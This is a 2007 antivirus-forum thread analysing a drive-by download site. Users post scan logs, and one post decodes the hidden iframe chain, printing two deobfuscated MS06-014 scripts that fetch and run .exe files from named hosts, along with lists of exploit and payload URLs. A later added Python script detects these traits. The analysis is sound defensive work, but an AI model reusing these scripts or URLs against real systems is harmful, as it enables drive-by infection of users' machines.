Thread starter: moonsilver

[Virus sample] Malicious site, can someone analyse it
剑指七星
Posted on 2007-5-11 11:40:30
Kaspersky 6: why is there no reaction at all?
scottxzt
Posted on 2007-5-11 11:47:45

Avira, without unpacking the archive, heuristic detection:

Begin scan in 'D:\Documents and Settings\dell\桌面\hua.rar'
D:\Documents and Settings\dell\桌面\hua.rar
  [0] Archive type: RAR
  --> hua.exe
      [DETECTION] Contains suspicious code HEUR/Malware
      [INFO]      The file was deleted!


End of the scan: 2007年5月11日  11:45
Used time: 00:07 min

The scan has been done completely.

      0 Scanning directories
      2 Files were scanned
      1 viruses and/or unwanted programs were found
      1 classified as suspicious:
      1 files were deleted
      0 files were repaired
      0 files were moved to quarantine
      0 files were renamed
      0 Files cannot be scanned
      0 Files not concerned
      1 Archives were scanned
      0 Warnings
欠妳緈諨
Posted on 2007-5-11 12:09:04
zj0303
Posted on 2007-5-11 12:15:31
2007-5-11 12:14:56        Safe'n'Sec 扫描报告

2007-5-11 12:14:56        扫描开始时间:        2007-5-11 12:14:56

2007-5-11 12:14:56        恶意软件处理:       
2007-5-11 12:14:56        扫描级别:        完全

2007-5-11 12:15:03        D:\新建文件夹\down.exe        被感染        Win32.Worm.Delf.NCS        删除
2007-5-11 12:15:03        D:\新建文件夹\hua.exe        被感染        BehavesLike:Win32.ExplorerHijack        删除
2007-5-11 12:15:06        D:\新建文件夹\m2005.bmp        被感染        Exploit.Win32.MS05-002.Gen        删除
2007-5-11 12:15:06        D:\新建文件夹\m2006.bmp        被感染        Exploit.Win32.MS05-002.Gen        删除
2007-5-11 12:15:06        D:\新建文件夹\1.jpg        被感染        Exploit.Win32.MS05-002.Gen        删除
2007-5-11 12:15:06        D:\新建文件夹\2.jpg        被感染        Exploit.Win32.MS05-002.Gen        删除
2007-5-11 12:15:06        D:\新建文件夹\d.jpg        被感染        Exploit.Win32.MS05-002.Gen        删除
2007-5-11 12:15:06        D:\新建文件夹\xskj.jpg        被感染        Exploit.Win32.MS05-002.Gen        删除
2007-5-11 12:15:06        扫描区域:

2007-5-11 12:15:06        D:\新建文件夹
2007-5-11 12:15:06       
2007-5-11 12:15:06        已扫描对象:        9
2007-5-11 12:15:06        已发现恶意对象:        8
2007-5-11 12:15:06        已删除恶意对象:        8

2007-5-11 12:15:06        扫描完成时间:        2007-5-11 12:15:06
jlj383940
Posted on 2007-5-11 12:39:05
2007-5-11 12:36:05        !**************************************************
                        Safe'n'Sec 警报
                        行为
                        日期和时间: 2007-5-11 12:34:57
                        类型: 添加一个新的系统服务
                        风险: 中等
                       
                        行为控制规则
                        名称:  
                       
                        程序
                        PID: 2672
                        PPID: 432
                        UID: JLJ\jljqq
                        文件: E:\下载\DOWNLOADS\HUA.EXE
                       
                        服务
                        名称: WINDOWSDOWN
                        描述: WORD
                        类型: 272
                        启动类型: 2
                        文件: C:\WINDOWS\SYSTEM32\SERVET.EXE
                        依存关系:
                        用户:
                        用户操作:        阻止, 记住此次选择 此次对话期间
                        阻止后终止程序
                        ***************************************************
2007-5-11 12:37:04        !**************************************************
                        Safe'n'Sec 警报
                        行为
                        日期和时间: 2007-5-11 12:36:28
                        类型: 添加一个新的系统服务
                        风险: 中等
                       
                        行为控制规则
                        名称:  
                       
                        程序
                        PID: 3416
                        PPID: 432
                        UID: JLJ\jljqq
                        文件: E:\下载\DOWNLOADS\SMDD.EXE
                       
                        服务
                        名称: WINDOWS XP
                        描述: WINDOWS XP
                        类型: 272
                        启动类型: 2
                        文件: C:\WINDOWS\SYSTEM\EXPLORER
                        依存关系:
                        用户:
                        用户操作:        阻止, 记住此次选择 此次对话期间
                        阻止后终止程序
                        ***************************************************
sfdx
Posted on 2007-5-11 12:52:41
BitDefender: 8 detections
C:\Documents and Settings\sui\桌面\Downloads.rar=>down.exe        感染: Win32.Worm.Delf.NCS
C:\Documents and Settings\sui\桌面\Downloads.rar=>down.exe        杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>down.exe        删除
C:\Documents and Settings\sui\桌面\Downloads.rar        Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>hua.exe        感染: BehavesLike:Win32.ExplorerHijack
C:\Documents and Settings\sui\桌面\Downloads.rar=>hua.exe        杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>hua.exe        删除
C:\Documents and Settings\sui\桌面\Downloads.rar        Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>m2005.bmp        感染: Exploit.Win32.MS05-002.Gen
C:\Documents and Settings\sui\桌面\Downloads.rar=>m2005.bmp        杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>m2005.bmp        删除
C:\Documents and Settings\sui\桌面\Downloads.rar        Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>m2006.bmp        感染: Exploit.Win32.MS05-002.Gen
C:\Documents and Settings\sui\桌面\Downloads.rar=>m2006.bmp        杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>m2006.bmp        删除
C:\Documents and Settings\sui\桌面\Downloads.rar        Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>1.jpg        感染: Exploit.Win32.MS05-002.Gen
C:\Documents and Settings\sui\桌面\Downloads.rar=>1.jpg        杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>1.jpg        删除
C:\Documents and Settings\sui\桌面\Downloads.rar        Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>2.jpg        感染: Exploit.Win32.MS05-002.Gen
C:\Documents and Settings\sui\桌面\Downloads.rar=>2.jpg        杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>2.jpg        删除
C:\Documents and Settings\sui\桌面\Downloads.rar        Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>d.jpg        感染: Exploit.Win32.MS05-002.Gen
C:\Documents and Settings\sui\桌面\Downloads.rar=>d.jpg        杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>d.jpg        删除
C:\Documents and Settings\sui\桌面\Downloads.rar        Archive repacking has failed (marked actions not taken)
C:\Documents and Settings\sui\桌面\Downloads.rar=>xskj.jpg        感染: Exploit.Win32.MS05-002.Gen
C:\Documents and Settings\sui\桌面\Downloads.rar=>xskj.jpg        杀毒失败
C:\Documents and Settings\sui\桌面\Downloads.rar=>xskj.jpg        删除
C:\Documents and Settings\sui\桌面\Downloads.rar        Archive repacking has failed (marked actions not taken)
dikex
Posted on 2007-5-11 13:28:33
Leave the grunt work of decoding this to me

——————————————————————————————————————————————————————

<iframe src=http://remix2008.myrice.com/gz.htm width=0 height=0></iframe>
<iframe src="
http://www.hao123hao123.cn/ok/index.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src=http://www.n85853.cn/index.htm width=0 height=0></iframe>
<iframe src=http://www.66ki.cn/index.htm width=100 height=0></iframe>



——————————————————————————————————————————————————————

http://remix2008.myrice.com/gz.htm:
MS06-014 + ANI web exploit, loading:
http://remix2008.myrice.com/m2006.bmp
which points to: http://remix2008.myrice.com/smdd.exe

It also contains <iframe src=http://remix2008.myrice.com/gz2.htm width=0 height=0></iframe>
which is likewise an MS06-014 + ANI web exploit:
http://remix2008.myrice.com/m2005.bmp
loading: http://remix2008.myrice.com/web.exe

——————————————————————————————————————————————————————

http://www.hao123hao123.cn/ok/index.htm
points to: <iframe src="http://www.qq881.cn/bbs/1881.htm" width="0" height="0" frameborder="0"></iframe>
which contains three:
<iframe src="http://www.955922.cn/web.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.ip528.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.chammm.cn/index.htm" width="0" height="0" frameborder="0"></iframe>

First, http://www.955922.cn/web.htm
points to http://www.18dmm.com/dm/kehu0738.htm
It is obfuscated with an encoding; converting it to GB2312 yields the source, which contains two ANI files:
http://18dmm.com/arp/1.jpg
http://18dmm.com/arp/2.jpg
plus another page, http://www.18dmm.com/arp/0614.htm, which decodes to:
function gn(n){var number = Math.random()*n;return Math.round(number)+'.exe';}try{aaa="obj";bbb="ect";ccc="Adodb.";ddd="Stream";eee="Microsoft.";fff="XMLHTTP";lj='http://www.18dmm.com/arp/down.exe'; var df=document.createElement(aaa+bbb); df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var x=df.CreateObject(eee+fff,""); var S=df.CreateObject(ccc+ddd,""); S.type=1; x.open("GET", lj,0); x.send(); mz1=gn(1000); var F=df.CreateObject("Scripting.FileSystemObject","");var tmp=F.GetSpecialFolder(0);var t2;t2=F.BuildPath(tmp,"rising"+mz1);mz1= F.BuildPath(tmp,mz1);S.Open();S.Write(x.responseBody);S.SaveToFile(mz1,2);S.Close();F.MoveFile(mz1,t2);var Q=df.CreateObject("Shell.Application","");exp1=F.BuildPath(tmp+'\\system32','cmd.exe');Q.ShellExecute(exp1,' /c '+t2,"","open",0);}catch(i){i=1;}
Like the two ANI files above, all of them load: http://www.18dmm.com/arp/down.exe

Second, http://www.ip528.cn/
points to: http://www.08325.cn/wm/xin4.htm?110
One ANI: http://www.08325.cn/wm/d.jpg
plus an encoded MS06-014: http://www.08325.cn/wm/0614.js, which decodes to:
function gn(n) { var number = Math.random()*n; return '~tmp'+'.tmp'; } try { dl='http://www.08325.cn/wm/down.exe'; var df=document.createElement("object"); df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); var S=df.CreateObject("Adodb.Stream",""); S.type=1; x.open("GET", dl,0); x.send(); fname1=gn(10000); var F=df.CreateObject("Scripting.FileSystemObject",""); var tmp=F.GetSpecialFolder(0); fname1= F.BuildPath(tmp,fname1); S.Open();S.Write(x.responseBody); S.SaveToFile(fname1,2); S.Close(); var Q=df.CreateObject("Shell.Application",""); exp1=F.BuildPath(tmp+'\\system32','cmd.exe'); Q.ShellExecute(exp1,' /c '+fname1,"","open",0); } catch(i) { i=1; }
Like the ANI above, it loads: http://www.08325.cn/wm/down.exe

Third, http://www.chammm.cn/index.htm
points to: http://s.gcuj.com/bd.htm?268002
One ANI: http://s.gcuj.com/t.js
plus one MS06-014: http://s.gcuj.com/1.htm
Both load: http://t.gcuj.com/0.exe

——————————————————————————————————————————————————————

http://www.n85853.cn/index.htm
points to: http://www.chenxinsms.com; which in turn contains two:
<iframe src="http://www.bz1000y.cn/" width="0" height="0" frameborder="0"></iframe>
<iframe src="http://www.1008y.cn/" width="0" height="0" frameborder="0"></iframe>

First, http://www.bz1000y.cn/
points to: http://www.08325.cn/wm/xin4.htm?666, the same as http://www.08325.cn/wm/xin4.htm?110 above;

Second, http://www.1008y.cn/
points to: http://www.18dmm.com/dm/kehu0749.htm?001, also the same as http://www.18dmm.com/dm/kehu0738.htm above

——————————————————————————————————————————————————————

http://www.66ki.cn/index.htm:
Yet another ANI: http://www.66ki.cn/xskj.jpg, plus an MS06-014: http://www.66ki.cn/news.htm; both load http://www.66ki.cn/hua.exe

——————————————————————————————————————————————————————

A whole pile of stuff, what a pain! Also, ANI + MS06-014 has become the mainstream of web-page trojan drops.


——————————————————————————————————————————————————————

ANI + MS06-014 exploit files appearing above:
http://remix2008.myrice.com/gz.htm
http://remix2008.myrice.com/gz2.htm
http://remix2008.myrice.com/m2006.bmp
http://remix2008.myrice.com/m2005.bmp
http://www.18dmm.com/dm/kehu0738.htm
http://18dmm.com/arp/1.jpg
http://18dmm.com/arp/2.jpg
http://www.18dmm.com/arp/0614.htm
http://www.08325.cn/wm/d.jpg
http://www.08325.cn/wm/0614.js
http://s.gcuj.com/t.js
http://s.gcuj.com/1.htm
http://www.08325.cn/wm/xin4.htm?666
http://www.18dmm.com/dm/kehu0749.htm?001
http://www.66ki.cn/xskj.jpg
http://www.66ki.cn/news.htm


Main virus payload files appearing above:
http://remix2008.myrice.com/smdd.exe
http://remix2008.myrice.com/web.exe
http://www.18dmm.com/arp/down.exe
http://www.08325.cn/wm/down.exe
http://t.gcuj.com/0.exe
http://www.66ki.cn/hua.exe


[ This post was last edited by dikex at 2007-5-11 13:30 ]
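Added example (not part of dikex's post and not a tool from this thread): a small Python triage script for the kind of drive-by chain unpacked above. It pulls the targets of zero-size iframes out of page source (the redirect chain), flags the MS06-014 markers visible in the decoded scripts (the RDS.DataSpace CLSID BD96C556-65A3-11D0-983A-00C04FC29E36, Adodb.Stream, XMLHTTP, Shell.Application), joining `"Micro"+"soft"`-style split literals first, and checks whether a file named .jpg/.bmp is really a RIFF/ACON animated cursor, which is the disguise every image in this thread used. All sample inputs are constructed for the demo with example.* hostnames, and the function names are my own.

```python
"""Drive-by chain triage helpers (added example, not from the thread).

Three defender-side checks modelled on what dikex unpacked by hand:
  hidden_iframes(html)        - src of iframes sized 0/1 px (the redirect chain)
  ms06014_indicators(script)  - MS06-014 (RDS.DataSpace) markers in decoded JS
  ani_disguised(name, data)   - RIFF/ACON cursor data behind an image extension
All sample inputs below are constructed for the demo (example.* hosts)."""
import re

# --- 1. hidden iframe extraction -------------------------------------------
IFRAME_RE = re.compile(r"<iframe\b([^>]*)>", re.IGNORECASE)
# quoted values may span a line break, as the thread's second iframe does
ATTR_RE = re.compile(r"""(\w+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>"']+))""")
ZERO_SIZE = {"0", "0px", "1", "1px"}


def parse_attrs(attr_text):
    """Return a lower-cased attribute dict from the inside of a tag."""
    attrs = {}
    for m in ATTR_RE.finditer(attr_text):
        value = next(v for v in m.groups()[1:] if v is not None)
        attrs[m.group(1).lower()] = value.strip()
    return attrs


def hidden_iframes(html):
    """Return src URLs of iframes whose width or height is 0/1 px."""
    hits = []
    for m in IFRAME_RE.finditer(html):
        attrs = parse_attrs(m.group(1))
        src = attrs.get("src", "")
        if src and (attrs.get("width") in ZERO_SIZE or attrs.get("height") in ZERO_SIZE):
            hits.append(src)
    return hits


# --- 2. MS06-014 markers in a decoded script ---------------------------------
MS06014_MARKERS = {
    "clsid_rds_dataspace": "bd96c556-65a3-11d0-983a-00c04fc29e36",
    "adodb_stream": "adodb.stream",
    "xmlhttp": "xmlhttp",
    "filesystemobject": "scripting.filesystemobject",
    "shell_application": "shell.application",
}
PAYLOAD_URL_RE = re.compile(r"""https?://[^\s"'<>]+?\.exe\b""")


def unsplit_strings(script):
    """Join "Micro"+"soft" style literal splitting so the needles match."""
    return re.sub(r"""["']\s*\+\s*["']""", "", script)


def ms06014_indicators(script):
    """Report which MS06-014 markers and .exe URLs a decoded script contains."""
    text = unsplit_strings(script).lower()
    found = [name for name, needle in MS06014_MARKERS.items() if needle in text]
    urls = sorted(set(PAYLOAD_URL_RE.findall(text)))
    likely = "clsid_rds_dataspace" in found and ("adodb_stream" in found or "xmlhttp" in found)
    return {"indicators": found, "payload_urls": urls, "likely_ms06014": likely}


# --- 3. ANI cursor hiding behind an image extension --------------------------
IMAGE_EXTS = (".jpg", ".jpeg", ".gif", ".bmp", ".png")


def is_ani(data):
    """RIFF container whose form type is ACON, i.e. a Windows animated cursor."""
    return len(data) >= 12 and data[:4] == b"RIFF" and data[8:12] == b"ACON"


def ani_disguised(filename, data):
    """True when an image-named file actually carries ANI cursor data."""
    return filename.lower().endswith(IMAGE_EXTS) and is_ani(data)


# --- constructed sample inputs ----------------------------------------------
SAMPLE_HTML = """<html><body><p>normal content</p>
<iframe src=http://redirect-a.example/gz.htm width=0 height=0></iframe>
<iframe src="
http://redirect-b.example/ok/index.htm" width="0" height="0" frameborder="0"></iframe>
<iframe src=http://redirect-c.example/index.htm width=100 height=0></iframe>
<iframe src="http://visible.example/widget" width="300" height="200"></iframe>
</body></html>"""

# decoded-script fragment carrying only the markers (no download/execute logic)
SAMPLE_JS = ("dl='http://payload.example/down.exe'; var df=document.createElement(\"object\"); "
             'df.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"); '
             'var x=df.CreateObject("Microsoft.X"+"M"+"L"+"H"+"T"+"T"+"P",""); '
             'var S=df.CreateObject("Adodb."+"Stream","");')

# minimal RIFF/ACON header plus padding; constructed, not a usable cursor
SAMPLE_ANI = (b"RIFF" + (48).to_bytes(4, "little") + b"ACON"
              + b"anih" + (36).to_bytes(4, "little") + b"\x00" * 36)

if __name__ == "__main__":
    print("hidden iframes:", hidden_iframes(SAMPLE_HTML))
    print("script verdict:", ms06014_indicators(SAMPLE_JS))
    print("1.jpg is really ANI:", ani_disguised("1.jpg", SAMPLE_ANI))
```

The string-joining step only handles literal concatenation; the first decoded script in the post builds its names from variables (`aaa+bbb`, `ccc+ddd`), so in practice run the check on output that has already been evaluated or deobfuscated, as dikex did, rather than on the raw encoded page.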
The EQs
Posted on 2007-5-11 13:30:25
Scan performed at: 2007-5-11 13:30:29
Scanning Log
NOD32 version 2256 (20070510) NT
Command line: C:\Documents and Settings\EQ2\桌面\Downloads
Operating memory - is OK

Date: 11.5.2007  Time: 13:30:33
Anti-Stealth technology is enabled.
Scanned disks, folders and files: C:\Documents and Settings\EQ2\桌面\Downloads\
C:\Documents and Settings\EQ2\桌面\Downloads\1.jpg - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\Downloads\2.jpg - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\Downloads\d.jpg - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\Downloads\down.exe - a variant of Win32/TrojanDownloader.Delf.BHO trojan
C:\Documents and Settings\EQ2\桌面\Downloads\hua.exe - a variant of Win32/TrojanDownloader.Delf.BHO trojan
C:\Documents and Settings\EQ2\桌面\Downloads\m2005.bmp - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\Downloads\m2006.bmp - a variant of Win32/TrojanDownloader.Ani.Gen trojan
C:\Documents and Settings\EQ2\桌面\Downloads\xskj.jpg - a variant of Win32/TrojanDownloader.Ani.Gen trojan
Number of scanned files: 9
Number of threats found: 8
Number of files cleaned: 8
Time of completion: 13:30:35 Total scanning time: 2 sec (00:00:02)
bb624
Posted on 2007-5-11 15:54:11
A-Squared  Found nothing
AntiVir  Found TR/Delphi.Downloader.Gen, TR/Dldr.Delf.bkg, BDS/Hupigon.Gen, EXP/Ani.Gen  
ArcaVir  Found nothing
Avast  Found CVE-2007-0038  
AVG Antivirus  Found BackDoor.Generic6.KTC  
BitDefender  Found Win32.Worm.Delf.NCS, BehavesLike:Win32.ExplorerHijack, Exploit.Win32.MS05-002.Gen (probable variant)  
ClamAV  Found Worm.Delf-41  
Dr.Web  Found Win32.HLLW.Autoruner, WIN.WORM.Virus, Exploit.ANIFile (probable variant)  
F-Prot Antivirus  Found Possibly a new variant of W32/CrazyCrunch-based!Maximus  
F-Secure Anti-Virus  Found Worm.Win32.Delf.bs, Trojan-Downloader.Win32.Delf.bkg, Backdoor.Win32.Hupigon.ete, Exploit.Win32.IMG-ANI.k, Exploit.Win32.IMG-ANI.ac, Exploit.Win32.IMG-ANI.gen, Exploit.Win32.IMG-ANI.x (probable variant)  
Fortinet  Found W32/ANI07.A!exploit  
Kaspersky Anti-Virus  Found Worm.Win32.Delf.bs, Trojan-Downloader.Win32.Delf.bkg, Backdoor.Win32.Hupigon.ete, Exploit.Win32.IMG-ANI.k, Exploit.Win32.IMG-ANI.ac, Exploit.Win32.IMG-ANI.gen, Exploit.Win32.IMG-ANI.x (probable variant)  
NOD32  Found a variant of Win32/TrojanDownloader.Delf.BHO, a variant of Win32/TrojanDownloader.Ani.Gen  
Norman Virus Control  Found nothing
Panda Antivirus  Found Trj/Downloader.OCR  
Rising Antivirus  Found Hack.Exploit.RIFF.a  
VirusBuster  Found Packed/Upack, Exploit.ANIFile.Gen, Exploit.ANIFile.L  
VBA32  Found Trojan-Dropper.Agent.35, Exploit.Signature (probable variant)
harry_chang2003
Posted on 2007-5-11 23:52:37
PCC kills six of them
Copyright © KaFan  KaFan.cn All Rights Reserved.